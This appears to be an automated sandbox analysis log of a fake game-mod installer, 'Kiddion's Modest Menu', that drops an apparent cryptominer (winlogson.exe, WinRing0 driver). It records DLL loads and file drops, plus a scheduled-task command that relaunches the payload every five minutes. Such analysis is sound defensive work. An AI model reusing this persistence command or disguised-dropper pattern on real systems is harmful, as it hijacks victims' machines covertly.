                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dllJump to behavior
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dllJump to behavior
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dllJump to behavior
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmitomi.dllJump to behavior
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mi.dllJump to behavior
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dllJump to behavior
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dllJump to behavior
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\powercfg.exeSection loaded: powrprof.dllJump to behavior
                  Source: C:\Windows\SysWOW64\powercfg.exeSection loaded: powrprof.dllJump to behavior
                  Source: C:\Windows\SysWOW64\powercfg.exeSection loaded: powrprof.dllJump to behavior
                  Source: C:\Windows\SysWOW64\powercfg.exeSection loaded: umpdc.dllJump to behavior
                  Source: C:\Windows\SysWOW64\powercfg.exeSection loaded: powrprof.dllJump to behavior
                  Source: C:\Windows\SysWOW64\powercfg.exeSection loaded: powrprof.dllJump to behavior
                  Source: C:\Windows\SysWOW64\powercfg.exeSection loaded: powrprof.dllJump to behavior
                  Source: C:\Windows\SysWOW64\powercfg.exeSection loaded: umpdc.dllJump to behavior
                  Source: C:\Windows\SysWOW64\powercfg.exeSection loaded: powrprof.dllJump to behavior
                  Source: C:\Windows\SysWOW64\powercfg.exeSection loaded: powrprof.dllJump to behavior
                  Source: C:\Windows\SysWOW64\powercfg.exeSection loaded: powrprof.dllJump to behavior
                  Source: C:\Windows\SysWOW64\powercfg.exeSection loaded: umpdc.dllJump to behavior
                  Source: C:\Windows\SysWOW64\powercfg.exeSection loaded: powrprof.dllJump to behavior
                  Source: C:\Windows\SysWOW64\powercfg.exeSection loaded: powrprof.dllJump to behavior
                  Source: C:\Windows\SysWOW64\powercfg.exeSection loaded: powrprof.dllJump to behavior
                  Source: C:\Windows\SysWOW64\powercfg.exeSection loaded: umpdc.dllJump to behavior
                  Source: C:\Windows\SysWOW64\powercfg.exeSection loaded: powrprof.dll
                  Source: C:\Windows\SysWOW64\powercfg.exeSection loaded: powrprof.dll
                  Source: C:\Windows\SysWOW64\powercfg.exeSection loaded: powrprof.dll
                  Source: C:\Windows\SysWOW64\powercfg.exeSection loaded: umpdc.dll
                  Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dll
                  Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dll
                  Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dll
                  Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: xmllite.dll
                  Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dll
                  Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dll
                  Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dll
                  Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: xmllite.dll
                  Source: C:\Users\user\AppData\Local\Temp\1C2NX3IUVJPXMLDGP.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                  Source: Kiddion's Modest Menu v.1.0.0.exeStatic file information: File size 1387560 > 1048576
                  Source: Kiddion's Modest Menu v.1.0.0.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                  Source: Binary string: C:\Users\Administrator\Desktop\Pch3lkinMinerBuilder\Task32Main\Task32Main\obj\Debug\Task32Main.pdb source: Kiddion's Modest Menu v.1.0.0.exe, 00000002.00000003.2016824681.0000000001665000.00000004.00000020.00020000.00000000.sdmp, Kiddion's Modest Menu v.1.0.0.exe, 00000002.00000003.2016929516.000000000161A000.00000004.00000020.00020000.00000000.sdmp, Kiddion's Modest Menu v.1.0.0.exe, 00000002.00000003.2017495532.0000000001604000.00000004.00000020.00020000.00000000.sdmp, Kiddion's Modest Menu v.1.0.0.exe, 00000002.00000002.2394339673.000000000161D000.00000004.00000020.00020000.00000000.sdmp, 1C2NX3IUVJPXMLDGP.exe, 0000000E.00000000.1416561359.0000000000662000.00000002.00000001.01000000.00000008.sdmp, 1C2NX3IUVJPXMLDGP.exe.2.dr
                  Source: Binary string: d:\hotproject\winring0\source\dll\sys\lib\amd64\WinRing0.pdb source: 1C2NX3IUVJPXMLDGP.exe, 0000000E.00000002.1489565252.0000000002BBC000.00000004.00000800.00020000.00000000.sdmp, WinRing0x64.sys.14.dr
                  Source: 1C2NX3IUVJPXMLDGP.exe.2.drStatic PE information: 0x9A21587A [Mon Dec 11 03:03:22 2051 UTC]
                  Source: winlogson.exe.14.drStatic PE information: real checksum: 0x7e7c4c should be: 0x74b70
                  Source: Kiddion's Modest Menu v.1.0.0.exeStatic PE information: real checksum: 0x0 should be: 0x15de46
                  Source: 1C2NX3IUVJPXMLDGP.exe.2.drStatic PE information: real checksum: 0x0 should be: 0x11c88
                  Source: winlogson.exe.14.drStatic PE information: section name: .xdata
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeCode function: 0_2_00A2DFCA push ecx; ret 0_2_00A2DFDD
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeCode function: 2_2_00452D7B push 00BB2166h; ret 2_2_00452D80
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeCode function: 2_2_00453FFC push ebp; retf 2_2_00453FFD
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeCode function: 2_2_00A004F7 push ebx; iretd 2_2_00A004F9
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeCode function: 2_2_00A004DD push ebx; iretd 2_2_00A004E3
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeCode function: 2_2_00A2DFCA push ecx; ret 2_2_00A2DFDD
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeCode function: 2_2_009EA775 push es; iretd 2_2_009EA776
                  Source: Kiddion's Modest Menu v.1.0.0.exeStatic PE information: section name: .text entropy: 7.09207256696417

                  Persistence and Installation Behavior

                  barindex
                  Source: C:\Users\user\AppData\Local\Temp\1C2NX3IUVJPXMLDGP.exeFile created: C:\ProgramData\Dllhost\WinRing0x64.sysJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\1C2NX3IUVJPXMLDGP.exeFile created: C:\ProgramData\Dllhost\WinRing0x64.sysJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\1C2NX3IUVJPXMLDGP.exeFile created: C:\ProgramData\Dllhost\winlogson.exeJump to dropped file
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeFile created: C:\Users\user\AppData\Local\Temp\1C2NX3IUVJPXMLDGP.exeJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\1C2NX3IUVJPXMLDGP.exeFile created: C:\ProgramData\Dllhost\WinRing0x64.sysJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\1C2NX3IUVJPXMLDGP.exeFile created: C:\ProgramData\Dllhost\winlogson.exeJump to dropped file

                  Boot Survival

                  barindex
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe SCHTASKS /CREATE /SC MINUTE /MO 5 /TN "dllhost" /TR "C:\ProgramData\Dllhost\dllhost.exe"

                  Hooking and other Techniques for Hiding and Protection

                  barindex
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\1C2NX3IUVJPXMLDGP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\1C2NX3IUVJPXMLDGP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\1C2NX3IUVJPXMLDGP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\1C2NX3IUVJPXMLDGP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\1C2NX3IUVJPXMLDGP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\1C2NX3IUVJPXMLDGP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\1C2NX3IUVJPXMLDGP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\1C2NX3IUVJPXMLDGP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\1C2NX3IUVJPXMLDGP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\1C2NX3IUVJPXMLDGP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\1C2NX3IUVJPXMLDGP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\1C2NX3IUVJPXMLDGP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\1C2NX3IUVJPXMLDGP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\1C2NX3IUVJPXMLDGP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\1C2NX3IUVJPXMLDGP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\1C2NX3IUVJPXMLDGP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\1C2NX3IUVJPXMLDGP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\1C2NX3IUVJPXMLDGP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\1C2NX3IUVJPXMLDGP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\1C2NX3IUVJPXMLDGP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\1C2NX3IUVJPXMLDGP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\1C2NX3IUVJPXMLDGP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\1C2NX3IUVJPXMLDGP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\1C2NX3IUVJPXMLDGP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\1C2NX3IUVJPXMLDGP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\1C2NX3IUVJPXMLDGP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\1C2NX3IUVJPXMLDGP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\1C2NX3IUVJPXMLDGP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\1C2NX3IUVJPXMLDGP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\1C2NX3IUVJPXMLDGP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\1C2NX3IUVJPXMLDGP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\1C2NX3IUVJPXMLDGP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\1C2NX3IUVJPXMLDGP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\1C2NX3IUVJPXMLDGP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\1C2NX3IUVJPXMLDGP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\1C2NX3IUVJPXMLDGP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\1C2NX3IUVJPXMLDGP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\1C2NX3IUVJPXMLDGP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\1C2NX3IUVJPXMLDGP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\1C2NX3IUVJPXMLDGP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\1C2NX3IUVJPXMLDGP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\1C2NX3IUVJPXMLDGP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\1C2NX3IUVJPXMLDGP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\1C2NX3IUVJPXMLDGP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\1C2NX3IUVJPXMLDGP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\1C2NX3IUVJPXMLDGP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\1C2NX3IUVJPXMLDGP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\1C2NX3IUVJPXMLDGP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\1C2NX3IUVJPXMLDGP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\1C2NX3IUVJPXMLDGP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\1C2NX3IUVJPXMLDGP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\1C2NX3IUVJPXMLDGP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\1C2NX3IUVJPXMLDGP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\1C2NX3IUVJPXMLDGP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\1C2NX3IUVJPXMLDGP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\1C2NX3IUVJPXMLDGP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\1C2NX3IUVJPXMLDGP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
